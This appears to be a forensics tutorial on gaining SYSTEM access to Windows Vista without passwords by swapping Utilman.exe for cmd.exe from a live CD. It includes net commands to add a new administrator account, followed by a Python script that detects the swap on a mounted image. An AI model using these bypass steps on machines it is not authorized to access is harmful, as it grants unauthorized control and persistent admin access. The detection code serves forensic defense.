Gaining SYSTEM user access in Microsoft Vista is a simple procedure and gives a forensic investigator a higher level of access than the administrator. This method of gaining access to a Microsoft Vista system doesn't require the investigator to know any of the usernames or passwords for the system.
- Boot the Vista machine with BackTrack or any other Live CD.
- Mount the NTFS partition.
- Rename C:\Windows\System32\Utilman.exe to anything else such as Utilman.old
- Copy C:\Windows\System32\cmd.exe to C:\Windows\System32\Utilman.exe
- Reboot
- At the Vista login screen, press the Windows key + U to launch the Utility Manager.
- Start cmd.exe
- Start explorer.exe
You can view a video showing this procedure here.
Also, once a command prompt is obtained via this method, we can use it to create a new user, add this user to the administrators group via the net command, and then log in rightfully with this account. The commands are:
net user USERNAME /add
net localgroup administrators USERNAME /add
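
From the examiner's side, the following added example (not part of the original page) checks a mounted System32 directory for the replacement described in the steps above: a Utilman.exe that is byte-identical to cmd.exe, or a renamed copy such as Utilman.old left beside it. The function names and the sample files are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def check_utilman_swap(system32):
    """Inspect a mounted System32 directory for the Utilman.exe replacement."""
    # Match names case-insensitively: NTFS mounted under Linux may be case-sensitive.
    files = {p.name.lower(): p for p in Path(system32).iterdir() if p.is_file()}
    utilman, cmd = files.get("utilman.exe"), files.get("cmd.exe")
    result = {"utilman_present": utilman is not None, "matches_cmd": False}
    if utilman and cmd:
        result["matches_cmd"] = sha256_of(utilman) == sha256_of(cmd)
    # A leftover such as Utilman.old suggests the original was moved aside.
    result["renamed_copies"] = sorted(
        p.name for name, p in files.items()
        if name.startswith("utilman.") and name != "utilman.exe"
    )
    result["suspicious"] = (result["matches_cmd"] or bool(result["renamed_copies"])
                            or not result["utilman_present"])
    return result


def build_sample(root, swapped):
    """Create a constructed System32 directory with placeholder file contents."""
    system32 = Path(root) / "Windows" / "System32"
    system32.mkdir(parents=True)
    (system32 / "cmd.exe").write_bytes(b"constructed cmd bytes")
    if swapped:
        (system32 / "Utilman.old").write_bytes(b"constructed utilman bytes")
        (system32 / "Utilman.exe").write_bytes(b"constructed cmd bytes")
    else:
        (system32 / "Utilman.exe").write_bytes(b"constructed utilman bytes")
    return system32


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for label, swapped in (("clean", False), ("swapped", True)):
            print(label, check_utilman_swap(build_sample(Path(tmp) / label, swapped)))
```

On a real image, pass the System32 path of the read-only mount to `check_utilman_swap`; a hash match with cmd.exe is the strongest of the three signals.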